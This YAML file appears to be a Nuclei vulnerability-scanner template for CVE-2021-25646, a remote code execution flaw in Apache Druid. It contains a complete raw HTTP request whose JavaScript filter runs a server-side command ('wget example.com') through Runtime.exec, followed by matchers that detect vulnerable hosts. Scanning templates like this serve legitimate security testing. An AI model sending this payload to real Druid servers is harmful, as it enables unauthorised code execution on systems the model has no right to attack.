nuclei-templates/cves/2021/CVE-2021-25646.yaml

48 lines
2.1 KiB
YAML

id: CVE-2021-25646
info:
name: Apache Druid RCE
author: pikpikcu
severity: critical
reference: https://paper.seebug.org/1476/
description: |
Apache Druid is a column-oriented open source distributed data storage written in Java, designed to quickly obtain large amounts of event data and provide low-latency queries on the data.
Apache Druid lacks authorization and authentication by default. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server.
requests:
- raw:
- |
POST /druid/indexer/v1/sampler?for=example-manifest HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Content-Type: application/json
Content-Length: 1006
Connection: close
{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","inputSource":{"type":"http","uris":["https://druid.apache.org/data/example-manifests.tsv"]},"inputFormat":{"type":"tsv","findColumnsFromHeader":true}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"timestamp","missingValue":"2010-01-01T00:00:00Z"},"dimensionsSpec":{},"transformSpec":{"transforms":[],"filter":{"type": "javascript",
"function": "function(value){return java.lang.Runtime.getRuntime().exec('wget example.com')}",
"dimension": "added",
"": {
"enabled": "true"
}
}
}
},"type":"index","tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":50,"timeoutMs":10000}}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "application/json"
part: header
condtion: and
- type: regex
regex:
- "numRowsRead"
- "https://druid.apache.org"
part: body
condtion: and